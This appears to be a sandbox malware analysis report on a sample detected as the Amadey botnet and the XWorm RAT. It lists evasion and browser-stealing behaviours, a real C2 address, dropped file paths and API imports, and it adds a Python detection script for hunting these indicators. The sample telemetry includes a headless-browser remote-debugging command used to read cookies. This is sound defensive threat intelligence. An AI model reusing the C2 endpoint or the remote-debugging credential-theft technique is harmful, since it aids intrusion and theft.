Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1560508
MD5: 6aed281d1464e3a53839bbd9e7190535
SHA1: 8ea6e9ec2eb3970e0c361538fb6dbd074e5fa6c2
SHA256: a20abe49e71912d860044fdf813c7fb90f32fde51097db4b689cac9c8f7a9ac9
Tags: exe, user-Bitsight

Detection

Amadey, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Telegram RAT
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found pyInstaller with non standard icon
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: XWorm
Description: Malware with a wide range of capabilities, ranging from RAT to ransomware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection

Source: file.exe Avira: detected
Source: http://185.215.113.43/Zu7JuNko/index.php8 Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpd-b6bf-11d0-94f2-00a0c9 Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php$ Avira URL Cloud: Label: malware
Note: the three URL variants differ only in the bytes that happened to follow the unterminated string in memory when it was extracted (the second one has picked up the tail of an adjacent GUID-like string). The C2 endpoint itself is http://185.215.113.43/Zu7JuNko/index.php, which matches the extracted configuration below; use that form, not the variants, as the network indicator.
Source: 00000003.00000002.2152067719.00000000007A1000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\samat[1].exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 47%
Source: file.exe ReversingLabs: Detection: 47%
Note: "Install Folder" and "Install File" in the configuration resolve to %LOCALAPPDATA%\Temp\abc3bc1985\skotes.exe, the dropped file listed above; its detection ratio equals that of the submitted sample, as expected when Amadey copies itself to its install path. samat.exe is a downloaded second-stage task: it was fetched through WinINet (hence the cache copy samat[1].exe under INetCache\IE), written to Temp\1008029001, and is a PyInstaller-packed Python program (see the Py* and PyWin* symbols in the code functions below). Its far lower detection ratio is the usual picture for a freshly built PyInstaller stealer and is not a reason to treat it as less dangerous.
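The extracted configuration and the dropped-file paths above, together with the "Sigma detected: Browser Started with Remote Debugging" and "Uses taskkill to terminate processes" entries in the signature list, are enough to build a hunt. The Python below is an added example written for this page; it is not code from Joe Sandbox, from the Sigma project, or from the malware. It assumes a simple, hypothetical event schema (type, image or path, cmdline, dst_host, url_path, sha256) that you would map onto your EDR export, uses a deliberately simplified stand-in for the Sigma rule (any --remote-debugging-* switch on a browser process), and generalises the 10-digit task folder from the single path on this page. The telemetry it runs over is constructed for the example.

```python
import json
import re

# Configuration string exactly as the report's Malware Configuration Extractor printed it.
AMADEY_CONFIG = json.loads(
    '{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", '
    '"Install Folder": "abc3bc1985", "Install File": "skotes.exe"}'
)

# SHA256 of the submitted sample, from the report header.
SAMPLE_SHA256 = "a20abe49e71912d860044fdf813c7fb90f32fde51097db4b689cac9c8f7a9ac9"

# Assumption: a simplified stand-in for the Sigma rule "Browser Started with Remote Debugging";
# any Chromium-style --remote-debugging-* switch on a browser process counts.
REMOTE_DEBUG_RE = re.compile(r"--remote-debugging-(port|pipe|address)\b", re.IGNORECASE)
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe"}

# Assumption: generalised from the single dropped path in the report
# (Temp\1008029001\samat.exe): Amadey writes downloaded tasks to a 10-digit folder under Temp.
TASK_DROP_RE = re.compile(r"\\appdata\\local\\temp\\\d{10}\\[^\\]+\.exe$")


def iocs_from_config(cfg):
    """Turn the extracted configuration into concrete, matchable indicators."""
    host, _, path = cfg["C2 url"].partition("/")
    return {
        "c2_host": host,
        "c2_path": "/" + path,
        # Amadey installs itself as %LOCALAPPDATA%\Temp\<Install Folder>\<Install File>;
        # match on the lower-cased path suffix so the user name does not matter.
        "install_suffix": "\\appdata\\local\\temp\\{}\\{}".format(
            cfg["Install Folder"], cfg["Install File"]
        ).lower(),
    }


def match_event(ev, iocs):
    """Return the names of every rule that fires on one telemetry event."""
    hits = []
    if ev["type"] == "network":
        if ev.get("dst_host") == iocs["c2_host"]:
            hits.append("amadey_c2_host")
            if ev.get("url_path") == iocs["c2_path"]:
                hits.append("amadey_c2_path")
        return hits

    # process and file events carry a path (the image for a process)
    path = ev.get("image" if ev["type"] == "process" else "path", "").lower()
    if path.endswith(iocs["install_suffix"]):
        hits.append("amadey_install_path")
    elif TASK_DROP_RE.search(path):
        hits.append("amadey_task_drop")

    if ev["type"] == "process":
        name = path.rsplit("\\", 1)[-1]
        cmdline = ev.get("cmdline", "")
        if name in BROWSERS and REMOTE_DEBUG_RE.search(cmdline):
            hits.append("browser_remote_debugging")
        if name == "taskkill.exe":
            hits.append("taskkill_used")

    if ev.get("sha256") == SAMPLE_SHA256:
        hits.append("known_sample_hash")
    return hits


def hunt(events, cfg=AMADEY_CONFIG):
    """Run every rule over a list of events; returns (event id, rule name) pairs in order."""
    iocs = iocs_from_config(cfg)
    return [(ev["id"], rule) for ev in events for rule in match_event(ev, iocs)]


# Constructed telemetry modelled on the paths and C2 in the report; not real log data.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "sha256": SAMPLE_SHA256,
     "image": r"C:\Users\alice\AppData\Local\Temp\abc3bc1985\skotes.exe", "cmdline": "skotes.exe"},
    {"id": 2, "type": "network", "dst_host": "185.215.113.43", "url_path": "/Zu7JuNko/index.php"},
    {"id": 3, "type": "process", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'chrome.exe --headless --remote-debugging-port=9222 --user-data-dir="C:\Users\alice\AppData\Local\Google\Chrome\User Data"'},
    {"id": 4, "type": "process", "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": "taskkill /F /IM chrome.exe"},
    {"id": 5, "type": "process", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe https://example.com"},
    {"id": 6, "type": "file", "path": r"C:\Users\alice\AppData\Local\Temp\1008029001\samat.exe"},
]

if __name__ == "__main__":
    for event_id, rule in hunt(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

The C2 host rule fires on the IP alone and the path rule only on the exact index.php endpoint, so a hit on both is high confidence while a host-only hit deserves a look at the URL. The install-path and task-folder rules are deliberately independent of the user name and of the random folder name's case, and the remote-debugging rule is worth keeping even outside an Amadey investigation: a headless browser started with --remote-debugging-port by anything other than a developer tool is the cheapest way a stealer has to read cookies and passwords without decrypting Application-Bound Encryption itself.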
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB9710 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,_Py_NoneStruct,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,PyEval_SaveThread,CryptUnprotectData,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,PyBytes_FromStringAndSize,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,Py_BuildValue,LocalFree,LocalFree,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z, 8_2_00007FF8B7EB9710
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB50E0 CryptReleaseContext, 8_2_00007FF8B7EB50E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB48D8 PyArg_ParseTupleAndKeywords,CryptDuplicateKey,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB48D8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5CD0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptImportKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EB5CD0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB50D0 CryptReleaseContext, 8_2_00007FF8B7EB50D0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBA0D0 PyArg_ParseTupleAndKeywords,PyEval_SaveThread,CryptGetDefaultProviderW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptGetDefaultProviderW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,free, 8_2_00007FF8B7EBA0D0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB94B0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,_Py_NoneStruct,PyExc_TypeError,PyErr_SetString,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,PyEval_SaveThread,CryptProtectData,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,LocalFree,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,PyMem_Free, 8_2_00007FF8B7EB94B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4490 _Py_Dealloc,_Py_Dealloc,CryptDestroyKey, 8_2_00007FF8B7EB4490
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBE870 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyLong_AsVoidPtr,PyErr_Occurred,PyErr_Clear,PyBytes_AsString,PyExc_ValueError,PyErr_Format,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,_Py_NoneStruct,PyExc_ValueError,PyErr_SetString,PyEval_SaveThread,CryptFormatObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptFormatObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,free,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EBE870
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3C60 PyArg_ParseTupleAndKeywords,CryptDuplicateHash,_Py_NewReference,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB3C60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBC860 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptSignAndEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptSignAndEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,CertFreeCertificateContext,free,CertFreeCertificateContext,free,free,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EBC860
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4050 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptVerifySignatureW,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EB4050
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4430 _Py_Dealloc,_Py_Dealloc,CryptDestroyKey, 8_2_00007FF8B7EB4430
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB9C30 PyList_New,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,malloc,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,Py_BuildValue,PyList_Append,_Py_Dealloc,free,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_Dealloc,free,GetLastError,free,PyExc_MemoryError,PyErr_Format, 8_2_00007FF8B7EB9C30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3C10 CryptDestroyHash,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB3C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBD010 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptGetMessageSignerCount,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyLong_FromLong,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EBD010
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5000 CryptMsgClose,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct, 8_2_00007FF8B7EB5000
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBF000 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptStringToBinaryW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,PyEval_SaveThread,CryptStringToBinaryW,PyEval_RestoreThread,_Py_Dealloc,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,Py_BuildValue,PyMem_Free, 8_2_00007FF8B7EBF000
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB43E0 _Py_Dealloc,_Py_Dealloc,CryptDestroyKey, 8_2_00007FF8B7EB43E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBAFD0 PyArg_ParseTupleAndKeywords,PyExc_ValueError,PyErr_SetString,PyExc_TypeError,PyErr_SetString,PyArg_ParseTuple,PyLong_AsLong,PyErr_Occurred,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyBytes_AsString,PyEval_SaveThread,CryptFindOIDInfo,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EBAFD0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4BC0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,malloc,PyErr_NoMemory,memcpy,CryptDecrypt,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,free,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EB4BC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBC3B0 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,CertFreeCertificateContext,free,free,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EBC3B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBD3B0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptVerifyDetachedMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,free,free,??1PyWinBufferView@@QEAA@XZ,free, 8_2_00007FF8B7EBD3B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3BA0 CryptDestroyHash, 8_2_00007FF8B7EB3BA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5B90 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,CryptCreateHash,_Py_NewReference,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB5B90
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5F80 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,PyArg_ParseTupleAndKeywords,CryptImportPublicKeyInfo,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB5F80
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBCB80 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptVerifyMessageSignature,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,Py_BuildValue,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptVerifyMessageSignature,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,CertFreeCertificateContext,??1PyWinBufferView@@QEAA@XZ,free, 8_2_00007FF8B7EBCB80
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3B70 CryptDestroyHash, 8_2_00007FF8B7EB3B70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3B60 CryptDestroyHash, 8_2_00007FF8B7EB3B60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4F60 CryptMsgClose,_Py_Dealloc, 8_2_00007FF8B7EB4F60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5350 PyArg_ParseTupleAndKeywords,CryptGetProvParam,malloc,PyExc_MemoryError,PyErr_Format,CryptGetProvParam,PyExc_NotImplementedError,PyErr_SetString,free,CryptGetProvParam,PyBool_FromLong,PyList_New,CryptGetProvParam,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,Py_BuildValue,PyList_Append,_Py_Dealloc,CryptGetProvParam,_Py_Dealloc,CryptGetProvParam,GetLastError,malloc,PyList_New,CryptGetProvParam,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,PyList_Append,_Py_Dealloc,CryptGetProvParam,_Py_Dealloc,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,PyList_New,CryptGetProvParam,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,Py_BuildValue,PyList_Append,_Py_Dealloc,CryptGetProvParam,_Py_Dealloc,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB5350
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBA350 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptFindLocalizedName,PyEval_RestoreThread,_Py_NoneStruct,_Py_NoneStruct,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z, 8_2_00007FF8B7EBA350
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4740 PyArg_ParseTupleAndKeywords,CryptGetKeyParam,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptGetKeyParam,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyExc_NotImplementedError,PyErr_SetString,free, 8_2_00007FF8B7EB4740
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBB740 PyArg_ParseTupleAndKeywords,PyList_New,PyEval_SaveThread,CryptEnumOIDInfo,PyEval_RestoreThread,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EBB740
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4F10 CryptMsgClose,_Py_Dealloc, 8_2_00007FF8B7EB4F10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3F00 PyArg_ParseTupleAndKeywords,CryptSignHashW,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptSignHashW,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,free, 8_2_00007FF8B7EB3F00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4ED0 CryptMsgClose,_Py_Dealloc, 8_2_00007FF8B7EB4ED0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB9A90 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptAcquireContextW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z, 8_2_00007FF8B7EB9A90
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBCE90 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyExc_TypeError,PyErr_SetString,PyEval_SaveThread,CryptGetMessageCertificates,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NewReference,PyLong_FromVoidPtr,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EBCE90
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5270 PyArg_ParseTupleAndKeywords,CryptGenKey,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB5270
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBBA70 PyArg_ParseTupleAndKeywords,PyExc_ValueError,PyErr_Format,?init@PyWinBufferView@@QEAA_NPEAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptQueryObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyLong_FromVoidPtr,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyLong_FromVoidPtr,Py_BuildValue,??1PyWinBufferView@@QEAA@XZ,PyMem_Free, 8_2_00007FF8B7EBBA70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB9E70 PyList_New,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,malloc,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,_Py_NoneStruct,Py_BuildValue,PyList_Append,_Py_Dealloc,free,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_Dealloc,free,GetLastError,free,PyExc_MemoryError,PyErr_Format, 8_2_00007FF8B7EB9E70
